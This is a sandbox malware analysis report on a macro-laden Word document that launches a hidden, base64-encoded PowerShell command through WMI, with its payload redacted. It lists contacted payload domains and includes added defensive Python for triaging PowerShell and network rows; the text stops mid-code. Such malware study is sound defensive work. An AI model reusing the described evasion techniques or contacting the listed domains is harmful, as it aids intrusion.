Malware Analysis Report

2024-12-07 15:22

Sample ID: 241113-zxtd4ssmem
Target: 5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090
SHA256: 5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090
Tags: macro, discovery, execution
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090

Threat Level: Known bad

The file 5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090 was found to be: Known bad.

Malicious Activity Summary

Tags: macro, discovery, execution

Process spawned unexpected child process

Blocklisted process makes network request

Suspicious Office macro

Command and Scripting Interpreter: PowerShell

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-13 21:06

Signatures

Suspicious Office macro

Tag: macro

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-13 21:06
Reported: 2024-11-13 21:07
Platform: win7-20240903-en
Max time kernel: 55s
Max time network: 19s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090.doc"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe |

Command and Scripting Interpreter: PowerShell

Tag: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

System Location Discovery: System Language Discovery

Tag: discovery

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Office loads VBA resources, possible macro or embedded object present

Modifies registry class

Process for all rows: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE; Target for all rows: N/A

Description | Indicator
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}\2.0\FLAGS
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}\2.0
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{028C805A-7B61-4866-92D8-78C2D6D28409}\2.0
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe

Powershell -w hidden -en [base64 EncodedCommand not reproduced here]

Network

Country Destination Domain Proto
US 8.8.8.8:53 theaustinochuks.com udp
US 8.8.8.8:53 sarafifallahi.com udp
US 8.8.8.8:53 faustosarli.com udp
US 172.67.190.216:80 faustosarli.com tcp
US 8.8.8.8:53 www.faustosarli.com udp
US 172.67.190.216:443 www.faustosarli.com tcp
US 8.8.8.8:53 janejahan.com udp
US 76.223.54.146:80 janejahan.com tcp
US 8.8.8.8:53 vikstory.ca udp

Files

memory/2868-0-0x000000002F801000-0x000000002F802000-memory.dmp

memory/2868-2-0x0000000070E2D000-0x0000000070E38000-memory.dmp

memory/2868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2868-7-0x0000000005BE0000-0x0000000005CE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1F274FB.wmf

MD5 ce49ee3415ccfe20542c60e539dfd349
SHA1 d664bdd7102a83cd8b8a7225cc350ed7e263431f
SHA256 b04fd90eccc2810015b46274f29feb1aae32b34ba7f5a0b0a5227d4d22ec61ab
SHA512 ae1ac111887f92ddf3a551630b96556776d838a2c3611a03802021ec1ed199671f4015956ebed2942d34e0977434e3c9e76e194e823d06ee4f3795612b31ea36

memory/2868-16-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-23-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-24-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-27-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2168-33-0x000000001B560000-0x000000001B842000-memory.dmp

memory/2168-34-0x00000000021D0000-0x00000000021D8000-memory.dmp

memory/2868-41-0x0000000070E2D000-0x0000000070E38000-memory.dmp

memory/2868-42-0x0000000005BE0000-0x0000000005CE0000-memory.dmp

memory/2868-43-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-44-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

memory/2868-45-0x0000000005DC0000-0x0000000005EC0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-13 21:06
Reported: 2024-11-13 21:07
Platform: win10v2004-20241007-en
Max time kernel: 47s
Max time network: 39s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090.doc" /o ""

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe |

Command and Scripting Interpreter: PowerShell

Tag: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4764 wrote to memory of 1688 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe
PID 4764 wrote to memory of 1688 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a85fc8a3d5b5f112e887d7e5a2518da1dff49c034363b5bc0c3b7d5b369d090.doc" /o ""

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe

Powershell -w hidden -en [base64 EncodedCommand not reproduced here]
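The process trees in both detonations (behavioral1 on Windows 7 / Office 2010, behavioral2 on Windows 10 / Office 2016) share the detail that matters for detection: WINWORD.EXE never appears as the parent of Powershell.exe. The sandbox attributes the PowerShell launch to C:\Windows\system32\wbem\wmiprvse.exe, which is the parent you get when a macro starts its payload through WMI instead of Shell or WScript.Shell: the child is parented under the WMI provider host, and any rule keyed on an Office application spawning PowerShell stays silent. The command line itself uses abbreviated switches (-w hidden, -en) that powershell.exe resolves by prefix, so a rule that matches only the literal -EncodedCommand misses it, and the -EncodedCommand argument is base64 of UTF-16LE text, so decoding it as UTF-8 produces nul-interleaved garbage. The Python below is an added example written for this page, not part of the sandbox output or of the sample: it normalises the switches, decodes the argument, and flags a WmiPrvSE.exe parent. The event records and the base64 payload are constructed (the report's real encoded command is not reproduced on this page), and the treatment of a bare -e as -EncodedCommand reflects powershell.exe's documented behaviour, which is assumed rather than shown here.

```python
"""PowerShell command-line triage for the process tree in this report.
Added example, not part of the sandbox output or the sample. EVENTS and the
base64 payload are constructed; the report's real -en argument is redacted."""
import base64
import shlex
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of a parameter name, so "-w"
# is -WindowStyle and "-en" is -EncodedCommand; a rule matching only the
# literal "-EncodedCommand" misses the command line in this report.
PARAMS = ["encodedcommand", "executionpolicy", "windowstyle", "noprofile",
          "noninteractive", "nologo", "noexit", "command", "file", "sta",
          "mta", "version", "inputformat", "outputformat"]
SWITCHES = {"noprofile", "noninteractive", "nologo", "noexit", "sta", "mta"}
# Assumption: powershell.exe resolves a bare "-e" to -EncodedCommand although
# other parameters also begin with "e".
SPECIAL = {"e": "encodedcommand"}


def resolve_param(token: str) -> Optional[str]:
    """Map '-w', '-en', '-WindowStyle', ... to the full lowercase parameter name."""
    if not token.startswith(("-", "/")):
        return None
    name = token.lstrip("-/").lower()
    if name in SPECIAL:
        return SPECIAL[name]
    hits = [p for p in PARAMS if p.startswith(name)]
    return hits[0] if len(hits) == 1 else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def parse_powershell(cmdline: str) -> Dict[str, object]:
    """Extract the window style and encoded payload from a powershell.exe line."""
    toks = shlex.split(cmdline, posix=False)  # keep Windows paths/quotes intact
    out: Dict[str, object] = {"hidden": False, "encoded": None, "decoded": None}
    i = 1  # skip the executable token
    while i < len(toks):
        p = resolve_param(toks[i])
        val = toks[i + 1] if i + 1 < len(toks) else ""
        if p == "windowstyle":
            out["hidden"] = val.lower() in ("hidden", "1")
        elif p == "encodedcommand":
            out["encoded"] = val
            try:
                out["decoded"] = decode_encoded_command(val)
            except (ValueError, UnicodeDecodeError):  # truncated or not base64
                out["decoded"] = None
        # switches take no value; every other resolved parameter consumes one
        i += 1 if (p is None or p in SWITCHES) else 2
    return out


WMI_HOST = "wmiprvse.exe"
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}


def triage_process_event(parent_image: str, image: str, cmdline: str) -> List[str]:
    """Reasons a process-creation event deserves attention (empty = none)."""
    findings: List[str] = []
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    child = image.rsplit("\\", 1)[-1].lower()
    if child not in ("powershell.exe", "pwsh.exe"):
        return findings
    if parent == WMI_HOST:
        # The macro launched PowerShell through WMI, so the child is parented
        # under the provider host and an Office->PowerShell rule never fires.
        findings.append("powershell launched via WMI provider host (Office parent link broken)")
    elif parent in OFFICE:
        findings.append("powershell spawned directly by an Office application")
    ps = parse_powershell(cmdline)
    if ps["hidden"]:
        findings.append("hidden window requested")
    if ps["encoded"] is not None:
        findings.append("encoded command (UTF-16LE base64)")
    return findings


# Constructed placeholder payload standing in for the redacted -en argument.
DEMO_SCRIPT = "Start-Sleep -Seconds 1"
DEMO_B64 = base64.b64encode(DEMO_SCRIPT.encode("utf-16-le")).decode("ascii")
EVENTS = [  # constructed (parent image, image, command line) records
    ("C:\\Windows\\system32\\wbem\\wmiprvse.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Powershell.exe",
     f"Powershell -w hidden -en {DEMO_B64}"),
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"),
]


def run_demo() -> Dict[str, List[str]]:
    """Triage every constructed event, keyed by parent image name."""
    return {p.rsplit("\\", 1)[-1]: triage_process_event(p, img, cl) for p, img, cl in EVENTS}


if __name__ == "__main__":
    for parent, findings in run_demo().items():
        print(f"{parent}: {'; '.join(findings) or 'nothing notable'}")
    print("decoded demo payload:", decode_encoded_command(DEMO_B64))
```

To apply this to the real sample, paste the -en argument from the raw sandbox JSON into decode_encoded_command; the decoded text is where the download URLs that produce the DNS activity below normally live. Hunting for the WmiPrvSE.exe parent is the durable detection: the child command line can be re-obfuscated at will, but launching via WMI always lands PowerShell under the provider host.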

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 theaustinochuks.com udp
US 8.8.8.8:53 sarafifallahi.com udp
US 8.8.8.8:53 faustosarli.com udp
US 104.21.20.20:80 faustosarli.com tcp
US 8.8.8.8:53 www.faustosarli.com udp
US 172.67.190.216:443 www.faustosarli.com tcp
US 8.8.8.8:53 20.20.21.104.in-addr.arpa udp
US 8.8.8.8:53 216.190.67.172.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 janejahan.com udp
US 13.248.169.48:80 janejahan.com tcp
US 8.8.8.8:53 vikstory.ca udp
US 8.8.8.8:53 48.169.248.13.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 92.123.26.217:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp (13 separate connections)
US 8.8.8.8:53 217.26.123.92.in-addr.arpa udp
US 8.8.8.8:53 136.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
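The Network tables of behavioral1 and behavioral2 mix three kinds of rows: the sample's own lookups and connections, Word's background traffic on the Windows 10 image (roaming.officeapps.live.com and the templates CDN), and the sandbox's reverse lookups of every address it saw (*.in-addr.arpa). The same separation applies to several host-side findings in this report: splwow64.exe, the MSForms and TypeLib class registrations Word writes when it loads a VBA project containing form controls, and the __PSScriptPolicyTest_*.ps1 file PowerShell creates at startup are side effects of the tooling, not the payload. What remains after filtering is the sample's behaviour: sequential lookups for five domains with HTTP or HTTPS connections to those that resolved, a pattern consistent with a download cradle iterating a list of payload URLs; since no executable appears in either Files section, the second stage was not captured within the detonation window. The Python below is an added example, not part of the sandbox output: it parses rows in the report's own four-column format, strips the noise by domain suffix, and separates domains the sample actually connected to from domains that only produced a DNS query. The embedded rows are the behavioral1 table in full plus representative noise rows copied from behavioral2; the noise suffix list is an assumption about what Word and the sandbox generate and should be tuned per image. Treat lookup-only domains as live indicators too: within a 19-second network window a domain that was only resolved may simply not have been reached yet, or may have been unresolvable or sinkholed at detonation time, and the resolved IPs are weaker indicators than the domains because payload hosts frequently sit behind shared CDN or hosting infrastructure.

```python
"""Network-table triage for this report: sample contacts vs. sandbox/Office noise.
Added example, not part of the sandbox output. NETWORK_ROWS is copied from the
report (behavioral1 in full plus representative noise rows from behavioral2)."""
from collections import defaultdict
from typing import Dict, List, Tuple

NETWORK_ROWS = """\
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 theaustinochuks.com udp
US 8.8.8.8:53 sarafifallahi.com udp
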